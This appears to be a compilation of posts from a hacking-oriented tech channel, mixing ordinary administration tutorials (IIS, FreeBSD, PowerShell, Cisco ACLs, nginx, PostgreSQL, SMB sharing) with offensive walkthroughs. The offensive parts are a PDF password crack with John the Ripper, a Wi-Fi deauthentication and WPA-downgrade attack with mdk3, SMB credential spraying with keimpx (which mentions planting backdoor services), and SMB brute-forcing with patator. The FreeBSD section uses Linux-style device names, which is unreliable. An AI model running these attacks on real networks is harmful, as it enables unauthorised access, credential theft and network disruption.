UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World's first platform that collects and analyzes every new hacking method.
+ AI Practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 A great hacker builds his own custom apps, so:
> To build your own Termux you need these official packages:

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) This project contains scripts and patches to build packages for the Termux Android application.

2) The packages available here are only from the main set. There are some additional repositories:

a) https://github.com/termux/game-packages
Game packages, e.g. angband or moon-buggy.

b) https://github.com/termux/science-packages
Science-related packages like gap and gnucap.

c) https://github.com/termux/termux-root-packages
Packages which can be used only on rooted devices. Some of the software available here requires a custom kernel (like aircrack-ng or lxc).

d) https://github.com/termux/unstable-packages
Staging repository. Packages that are not stable are only available here. Most likely, new packages will also be placed here.

e) https://github.com/termux/x11-packages
Packages that require the X11 Window System.

WRITTEN BY UNDERCODE
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 IIS: web.config stub page for errors (part 2)
Continuing the IIS series; the first part covered customErrors.

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

> The task is changing and becoming more complicated.

> Everyone must now see stub pages instead of errors, while developers can still read the error logs in XML.

> For IIS I chose Failed Request Tracing Rules. If the feature was not installed with the role initially, add it to IIS in the Windows Server components:

Web Server - Health and Diagnostics - Tracing

Now, in the IIS snap-in, open the site you need and you will see Failed Request Tracing Rules.

In Failed Request Tracing Rules, in the "Actions" section on the right, select "Edit Site Tracing" and enable tracing.

In Failed Request Tracing Rules, in the "Actions" section on the right, select "Add":

1) All content (*)

2) Status codes - for example 401-999

3) For example, we are interested in everything (all providers)

4) Finish

5) Now in "C:\inetpub\logs\FailedReqLogFiles\" you will see folders with logs

6) Do not forget that I also added stub pages; you can now see this in the config - path="/CustomErrors/error.aspx"

In Web.config, the fragment looked like this:

<system.webServer>
...
<httpErrors errorMode="Custom" existingResponse="Replace" >
<clear/>
<error statusCode="401" path="/CustomErrors/error.aspx" responseMode="ExecuteURL" />
<error statusCode="403" path="/CustomErrors/error.aspx" responseMode="ExecuteURL" />
<error statusCode="404" path="/CustomErrors/error.aspx" responseMode="ExecuteURL" />
<error statusCode="405" path="/CustomErrors/error.aspx" responseMode="ExecuteURL" />
<error statusCode="406" path="/CustomErrors/error.aspx" responseMode="ExecuteURL" />
<error statusCode="412" path="/CustomErrors/error.aspx" responseMode="ExecuteURL" />
<error statusCode="501" path="/CustomErrors/error.aspx" responseMode="ExecuteURL" />
<error statusCode="502" path="/CustomErrors/error.aspx" responseMode="ExecuteURL" />
</httpErrors>
<tracing>
<traceFailedRequests>
<add path="*">
<traceAreas>
<add provider="ASP" verbosity="Verbose" />
<add provider="ASPNET" areas="Infrastructure,Module,Page,AppServices" verbosity="Verbose" />
<add provider="ISAPI Extension" verbosity="Verbose" />
<add provider="WWW Server" areas="Authentication,Security,Filter,StaticFile,CGI,Compression,Cache,RequestNotifications,Module,FastCGI" verbosity="Verbose" />
</traceAreas>
<failureDefinitions statusCodes="401-999" />
</add>
</traceFailedRequests>
</tracing>
</system.webServer>

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to add a new hard drive to FreeBSD

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> Adding a new hard drive to FreeBSD

1) We have a hard drive defined as:
/dev/sdb1

2) Delete the existing layout of the sdb1 disk:
gpart destroy -F sdb1

3) Create a new GPT layout on the sdb1 disk:
gpart create -s gpt /dev/sdb1

4) Example of creating swap and UFS partitions:
gpart add -t freebsd-swap -s 1048576 /dev/sdb1
gpart add -t freebsd-ufs /dev/sdb1

5) Create a UFS file system on the second partition created:
newfs -U /dev/sdb1p2

6) Add lines to /etc/fstab so the partitions are mounted when the OS boots:
/dev/sdb1p1 none swap sw 0 0
/dev/sdb1p2 /mnt ufs rw 2 2

7) Mount the UFS partition on the fly:
mount -a

8) Enable the swap partition on the fly:
swapon /dev/sdb1p1

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 PowerShell small commands by UndercOde:

1) PowerShell is located here:
C:\Windows\System32\WindowsPowerShell\v1.0
or
%SystemRoot%\System32\WindowsPowerShell\v1.0

2) There is also a development tool - ISE (Integrated Scripting Environment)
powershell_ise.exe

3) Running PowerShell scripts:
By default, running Windows PowerShell scripts is not allowed.

4) Restricted level - prohibits script execution
Unrestricted level - all scripts can be run
AllSigned level - all scripts must be digitally signed
RemoteSigned level - scripts from the network must be signed

5) The level is set by a parameter in the registry under the path HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell, for example - "ExecutionPolicy"="AllSigned"
Or it is controlled with the cmdlets Get-ExecutionPolicy and Set-ExecutionPolicy
Example: Set-ExecutionPolicy RemoteSigned

The basic construction of the language is verb-noun.

🦑 Simple examples:

1> Get-Help - display help.

2> Get-Process - list the processes.

3> Get-Command - print commands.

🦑 Parameters are passed with a hyphen "-".

Output the commands with the verb "Get":

Get-Command -Verb Get

Output the commands with the noun "Event":

Get-Command -Noun Event

🦑 Implicit parameter passing to the Get-Help command (help for a command):

Get-Help Get-Event

Get-Help Get-Event -Detailed

Get-Help Get-Event -Full

Get-Help Get-Event -Examples

List of modules in PowerShell:

Get-Module -ListAvailable

Print all commands from the NetTCPIP module:

> Get-Command -Module NetTCPIP

Update help (you need an Internet connection and administrator rights):

Update-Help

🦑 Environment variables:
Get-ChildItem env:
dir env: | sort name

🦑 Output a variable's name and value
Get-Item env:windir
Get-ChildItem env:UserName

🦑 Output the value of a variable

> Write-Host $env:windir
Write-Host $env:UserName
Write-Host ([System.Environment]::CurrentDirectory)
Write-Host ([System.Environment]::UserName)

# Changing variables (the Set-Item, Remove-Item, and Copy-Item cmdlets are available)
$env:customvar = "Var1"
$env:customvar = $env:customvar + "Var2"
Set-Item -Path env:customvar -Value ($env:customvar + 'Var3')

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Creating access lists for Cisco routers:

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Configure a simple (standard) list (identifier up to 100):
Create list 10 and deny in it any connections from the address 192.168.0.2

R1(config)# access-list 10 deny 192.168.0.2

2) Attach the list to the interface in the inbound direction:

R1(config)# interface fastEthernet 1/0
R1(config-if)# ip access-group 10 in
R1(config-if)# exit

3) Remove a list as follows (you cannot change a simple list):
Once you have entered the interface, enter

R1(config-if)# no ip access-group 10 in

4) Configure a complex (extended) list (identifier greater than 100):

Create

R2(config)# ip access-list extended 110

5) Enter the list and configure it (disable icmp between the hosts):

R2(config)# ip access-list extended 110
R2(config-ext-nacl)# deny icmp host 192.168.0.1 host 192.168.0.2
R2(config-ext-nacl)# exit

6) Attach it to the interface

R2(config)# interface fastEthernet 1/0
R2(config-if)# ip access-group 110 in

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Hidden redirect, rewrite and reverse proxy in nginx to a third-party server:

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Redirect: rewrites the address in the browser and defines a new (rewritten) one
#server {
#    listen 3001;
#    server_name test-on-mongo;
#    return 301 $scheme://test-on-mongo:5001$request_uri;
#}

2) Rewrite: rewrites the address in the browser and defines a new (rewritten) one
#server {
#    listen 3001;
#    server_name test-on-mongo;
#    rewrite ^(.*)$ $scheme://test-on-mongo:5001$1 permanent;
#    return 403;
#}

3) Rewrite: rewrites the address in the browser and defines a new (rewritten) one
#server {
#    listen 3001;
#    server_name test-on-mongo;
#    location / {
#        if ($http_host ~ "^test-on-mongo:3001") {
#            rewrite ^/(.*) http://test-on-mongo:5001 redirect;
#        }
#    }
#}

4) A third-party web server is running on port 3001; it was previously on port 5001.

5) From the old link on port 5001, nginx redirects to port 80, and then to 3001
# Done to drop the port from the URL
server {
    listen 80;
    listen [::]:80;
    server_name test-on-mongo;

    location / {
        proxy_pass http://test-on-mongo:3001;
    }
}

server {
    listen 5001;
    listen [::]:5001;
    server_name test-on-mongo;

    return 301 $scheme://test-on-mongo$request_uri;
}

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Official Microsoft GitHub repository containing code samples for SQL Server, for any Linux server, Windows or Windows Server

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone -n https://github.com/Microsoft/sql-server-samples

2) cd sql-server-samples

3) git config core.sparsecheckout true

4) echo samples/features/*| out-file -append -encoding ascii .git/info/sparse-checkout

5) echo samples/demos/*| out-file -append -encoding ascii .git/info/sparse-checkout

6) git checkout

🦑 Extra note recommended by UndercOde:

> Sparse checkouts enable you to work on a subset of the repository. It's worth the effort to set up sparse checkouts on large repositories, everything is much faster!

> I struggled with setting it up on Windows, getting a lot of "error: Sparse checkout leaves no entry on the working directory". After a bit of research, I found the following steps were minimal and had consistently good results for me – YMMV.

> The most important point is this – DO NOT USE POWERSHELL/CMD FOR THESE STEPS – use a git bash prompt. This is because otherwise the echo command produces a UNICODE file with a BOM marker. The file MUST be an ANSI formatted file with UNIX style line endings for git to parse it correctly. This is the most likely cause of "error: Sparse checkout leaves no entry on the working directory" errors.

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to crack a PDF password - tested guide:

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/magnumripper/JohnTheRipper.git

2) cd ./JohnTheRipper/src

3) sudo apt-get update

4) sudo apt-get install libssl-dev

5) ./configure && make

6) cd ..

7) cd ./run

8) ls

🦑 Generate the PDF hash file:

Type in the terminal:

> pdf2john.pl /root/Desktop/pdf_exampleprotected.pdf > /root/Desktop/pdf.hash

🦑 Brute force with John:

Now:
> john exampleprotected_pdf.hash

> john --wordlist=password.lst exampleprotected_pdf.hash

🦑 Tested by UndercOde on:

> Kali

> Parrot

> Debian

> Ubuntu

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 PowerShell: send SMTP email with authorization:

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

Now the PowerShell code. I wanted to check whether the services are running and, if one of interest is stopped, send an SMTP notification.

# Sender and Recipient Info
$MailFrom = "sender@senderdomain.com"
$MailTo = "recipient@recipientdomain.com"

# Sender Credentials
$Username = "SomeUsername@SomeDomain.com"
$Password = "SomePassword"

# Server Info
$SmtpServer = "smtp.domain.com"
$SmtpPort = "2525"

# Message stuff
$MessageSubject = "Live your best life now"
$Message = New-Object System.Net.Mail.MailMessage $MailFrom,$MailTo
$Message.IsBodyHTML = $true
$Message.Subject = $MessageSubject
$Message.Body = @'
<!DOCTYPE html>
<html>
<head>
</head>
<body>
This is a test message to trigger an ETR.
</body>
</html>
'@

# Construct the SMTP client object, credentials, and send
$Smtp = New-Object Net.Mail.SmtpClient($SmtpServer,$SmtpPort)
$Smtp.EnableSsl = $true
$Smtp.Credentials = New-Object System.Net.NetworkCredential($Username,$Password)
$Smtp.Send($Message)

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 PostgreSQL guide by UTC
The scheme of the PostgreSQL application is as follows:

1) The "POSTMASTER" process on the server receives a connection request

2) Upon successful completion of the check, POSTMASTER creates a copy of itself

3) Further interaction between the client and the database goes through this copy

🦑 After installation (configuring a database cluster)

On Windows, the installation package will most likely set everything up automatically to start the cluster in the specified directory, but you can also configure the cluster with the initdb and pg_ctl utilities described below; they are in the bin directory, for example - D:\Postgres\bin

A cluster, in this case, is a set of databases managed by a single server instance.

🦑 A single PostgreSQL instance can start and monitor a set of databases that are isolated from each other but served through the same TCP/IP or UNIX socket

You can create a cluster with:

initdb - creates a new PostgreSQL database cluster

The syntax is initdb [option ...] [--pgdata | -D] directory

🦑 The desired location of the database cluster is indicated by the -D option:

> sudo su - postgres

> initdb -D /usr/local/pgsql/data

Or like this:

$ sudo su - postgres

$ pg_ctl -D /usr/local/pgsql/data initdb

🦑 After that, you can try to start the server - sudo service postgresql start

Or there are other options:

Run postmaster in the foreground:

$ postmaster -D /usr/local/pgsql/data

Run in the background using pg_ctl:

$ pg_ctl -D /usr/local/pgsql/data -l /tmp/postgresql.log start

🦑 Examples of pg_ctl actions:


Server start:

$ pg_ctl start


Server Stop:

$ pg_ctl stop


Server restart:

$ pg_ctl restart


Server Status:

$ pg_ctl status

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 psql utility:

The psql utility, which ships in the standard distribution in the postgresql-client package, is used for administration. Here are several examples of its functionality (the examples for Windows and Linux are similar).

1) On Linux - su - postgres, on Windows - cmd - psql

psql --help - help

2) Some utility arguments:

psql -l - list the databases

psql -d database - connect to the database named "database"

psql -f script.sql - execute the SQL script "script.sql"

psql -d test -H -c "SELECT * FROM students" -o D:\Postgres\f.html - output to a file

3) Listing configuration files:

psql> SELECT name, setting FROM pg_settings WHERE category = 'File Locations';

4) Listing active sessions:

psql> SELECT * FROM pg_stat_activity;

5) Kill a session:

- Find the session id with:

SELECT datname AS database,
pid,
usename AS username,
application_name AS application,
client_addr AS client_address,
query
FROM pg_stat_activity;

- Specify the session id and database:

SELECT pg_terminate_backend(<session id>)
FROM pg_stat_activity
WHERE datname = 'DB';

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Some BlackArch program examples 2019-2020

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) blackarch-code-audit
Packages that audit existing source code for vulnerability analysis.

Examples: flawfinder, pscan

2) blackarch-cracker
Packages used to crack cryptographic functions, such as passwords.

Examples: hashcat, john, crunch

3) blackarch-crypto
Packages that work with cryptography, with the exception of cracking.

Examples: ciphertest, xortool, sbd

4) blackarch-cryptography
Security audit tools for cryptographic algorithms and technologies.

Examples: pyssltest, skul

5) blackarch-database
Packages that at some level include exploit databases.

Examples: metacoretex, blindsql

6) blackarch-debugger
Packages that allow the user to see what a particular program "does" in real time.

Examples: radare2, shellnoob

7) blackarch-decompiler
Packages that try to convert compiled programs to source code.

Examples: flasm, jd-gui

8) blackarch-defensive
Packages that are used to protect against malware and attacks from other users.

Examples: arpon, chkrootkit, sniffjoke

9) blackarch-disassembler
Like blackarch-decompiler, and a lot of programs will probably fall into both categories; however, these packages produce assembler code in the output rather than the raw source code.

Examples: inguma, radare2

10) blackarch-dos
Packages that use DoS (Denial of Service) attacks.

Examples: 42zip, nkiller2

11) blackarch-drone
Packages that are used to control physically engineered drones.

Examples: meshdeck, skyjack

12) blackarch-exploitation
Packages that take advantage of exploits in other programs or services.

Examples: armitage, metasploit, zarp

& more...
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 WIFI HACKING: WPA downgrade test:
The WPA downgrade test is a test mode indicated by the letter g. This mode has only one option, -t <bssid>, after which you need to specify the target network.

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> The essence of this attack is that mdk3 deauthenticates stations and APs by sending encrypted WPA packets. With this test, you can check whether the system administrator will try to switch the network to WEP or disable encryption. mdk3 lets clients work with WEP or without encryption, so this attack is carried out in the hope that the system administrator will simply think that "WPA is broken". The attack is therefore designed for an advanced user who will think of changing the router settings and is able to do so. It is a form of social engineering; to increase the likelihood of a successful outcome, it can be combined with other social engineering techniques.

1) Look at the available networks:

> sudo airodump-ng wlan0

2) Suppose we are interested in a network called dlink; it uses WPA2 encryption, its BSSID is 00:1E:58:C6:AC:FB, and we also note that the AP works on channel 6.

3) We need to switch our wireless card to the same channel the AP works on:

> sudo iw wlan0 set channel 6

4) We launch an attack that disconnects all clients from this network and prevents them from reconnecting until encryption is changed to WEP or removed altogether:

> sudo mdk3 wlan0 g -t 00:1E:58:C6:AC:FB

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 What is mdk3 and what can it do?

> mdk3 is a multifunctional program whose main goal is to show the weak points of Wi-Fi networks. The mdk3 utility can be used to jam Wi-Fi, to deauthenticate clients, to confuse wireless network monitors or to confuse intruders who want to attack your wireless network, as well as to perform an attack aimed at downgrading the encryption algorithm from WPA to a weaker one or at abandoning encryption altogether. That is, the program is very versatile.

🦑 Now using mdk3:
The program starts as follows:

> mdk3 -h

🦑 In the usage:

<interface> is the name of your wireless interface,

<test mode> is one of the program's functions, for example, stress testing, flood, etc. It is indicated by a lowercase letter without a dash.
mdk3 cannot put cards into monitor mode and does not switch the interface to the desired channel. This is the most frequent reason why mdk3 does not work. These are the most common usage errors - before you start an attack, you need to switch to the desired channel yourself.

🦑 Stop NetworkManager so that it does not get in the way:

> sudo systemctl stop NetworkManager

Put the wireless interface into monitor mode:

> sudo ip link set wlan0 down

> sudo iw wlan0 set monitor control

> sudo ip link set wlan0 up

Note that the interface name is still wlan0, although it is now in monitor mode

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 keimpx 2020 tool:
keimpx is an open source tool for quickly checking credentials over the network via SMB. Credentials can be:

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

> The combination of user / password in clear text.

> User / NTLM hash combination.

> NTLM login / user session token combination.

🦑 If any valid credentials were found on the network after this phase of the attack, the program asks the user to select a host to connect to and which valid credentials to use. They are used to open an interactive SMB shell where the user can:

1) Launch an interactive command line.

2) Perform actions in remote SMB network folders: display a list of files and folders, upload and download files, create and delete files, etc.

3) Deploy and remove your own services, for example, a backdoor listening on a TCP port for incoming connections.

4) Show details about users, domains, and password policies.

Scan the subnet (-t 192.168.0.0/24), checking the validity of the username (-U Alexey) and password (-P qweqwe123) on all hosts with network folders:

> git clone https://github.com/nccgroup/keimpx

> cd keimpx

> python3 ./keimpx.py -t 192.168.0.0/24 -U Alexey -P qweqwe123

Connect to the remote host (-t 192.168.0.101) using the username (-U Undercode) and password (-P qweqwe123):

> python3 ./keimpx.py -t 192.168.0.101 -U Undercode -P qweqwe123

As a result, the specified credentials will be checked for correctness. If they are correct, you will be prompted to connect and open an interactive shell to interact with the remote system.

🦑 TESTED

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Brute-force SMB shared folder user credentials with patator

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) The patator program is designed for brute-forcing credentials and is one of the most flexible to configure.

2) To brute-force online the login and password of a user for accessing a shared folder (and therefore the Windows user credentials), run a command of the form:

> git clone https://github.com/lanjelot/patator
./patator.py smb_login host=192.168.0.101 user=FILE0 password=FILE1 0=/root/logins.txt 1=/root/passwords.txt -x ignore:fgrep='STATUS_LOGON_FAILURE'

🦑 In this command:

./patator.py - the name of the executable file; depending on the installation method it may be patator
smb_login - SMB brute-force module
host=192.168.0.101 - IP address of the computer whose password is being guessed. You can specify a file with hosts (more precisely, the file placeholder number)
user=FILE0 - username for brute force. Instead of a name, a placeholder pointing to file number 0
password=FILE1 - password for brute force. Instead of a single password, a placeholder pointing to file number 1
0=/root/logins.txt - path to file number 0
1=/root/passwords.txt - path to file number 1
-x ignore:fgrep='STATUS_LOGON_FAILURE' - do not display attempts for which the response contained the line STATUS_LOGON_FAILURE

🦑 As an example, two pairs of credentials were found:

undercodeOverlord:1234
undercode2:qweqwe123

The computer name and Windows version were obtained:

\ UndercOdeTesting (Windows 10.0 Build 18362)

Another account was found for which the message STATUS_ACCOUNT_RESTRICTION was received:

mial:

The message says that there are account restrictions for the user mial. The reason is that the username and password are correct (empty password), but users without a password are not allowed on this computer.

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 What is the SMB protocol in Windows:

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Server Message Block (SMB) is a networking file share protocol included in Windows 10 that provides the ability to read and write files and perform other service requests to network devices.

2) Usually, you'll be using SMB to connect to devices that don't run Windows, such as a router with file sharing capabilities, Network-Attached Storage (NAS), or other computers running Linux.

3) Although there have been three major releases of the protocol, there is a chance that you may still have devices running the original version, such as SMB version 1 (v1) which is old and insecure, and Windows 10 no longer installs it by default starting with the Fall Creators Update and April 2018 Update. As a result, you'll get error messages like "You can't connect to the file share because it's not secure;" "The specified network name is no longer available;" and "Unspecified error 0x80004005" when trying to access your files.

That's all!
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 SMB protocol recommended settings by UndercOde:

> Optional: there are several versions of the SMB protocol, and by default the first version is disabled on modern Windows systems.

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Samba uses the first version for some functions, so if you have a mixed Linux network or if you have outdated equipment that only supports SMB 1, then you can enable support for this version of the protocol. To do this, run cmd with administrator privileges. Check:

> dism /online /get-features /format:table | find "SMB1"

2) To enable SMB 1, do:

> dism /online /enable-feature /all /featurename:SMB1Protocol-Server

3) If you want to disable it, then do:

> dism /online /disable-feature /featurename:SMB1Protocol-Server

4) If you prefer a graphical interface, type "Turn Windows features on or off" in the search, switch the feature on, then apply.

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to set up a network share on Windows (SMB) without a password

1) Computers must be on the same LAN

2) If your devices are connected to the same router, then they will all have access to the shared folder.

3) If you do the configuration in virtual machines, then in the "Network" tab, select "Network Bridge" as the "Connection Type".

4) Static IP
A static IP address on the computer where the folder will be located is optional for configuring an SMB shared folder. The shared network folder (share) can be accessed by computer name. Nevertheless, if you are more used to using IP addresses, then you need to configure a static IP address for the computer that will act as the file server.

5) Computers must have the same workgroup
A computer with a shared folder, as well as all other computers that will have access to the shared folder via SMB, must be in the same workgroup.

6) By default, in the Windows operating system, all computers are in the same workgroup, named WORKGROUP.

7) To check the current group on your computer, open Explorer, find the "This computer" tab in it, click the "Computer" button at the top and click the "Properties" button in the menu that opens.

8) In the new window that opens, you will see "Computer Name" and "Workgroup".

9) If you want to change these values, then click "Change Settings".

Click the "Change" button to assign a new name to the computer.

10) Network folder settings in Windows
Windows SMB provides not only network folders, but also the sharing of printers and other resources. Therefore, the settings of shared folders (network shares) are called "shared".

On Windows, when you connect to a new network, you may receive a request; click Yes and you are done.

11) A universal option, suitable for both wired and Wi-Fi connections: right-click on the network connection icon and click "Open network and Internet settings".

12) In the window that opens, click on "Sharing Options":

> If you want to reach these settings through the "Control Panel", the path is: Control Panel\Network and Internet\Network and Sharing Center\Additional sharing options

In the new window, the settings are divided into three sections:

Private
Guest or public
All networks

13) Password-protected sharing
The description says: If password protection is enabled for shared access, only users with an account and password on this computer can access shared files, printers connected to this computer, and shared folders. To open access to other users, you need to disable password protection for shared access.
> switch to off

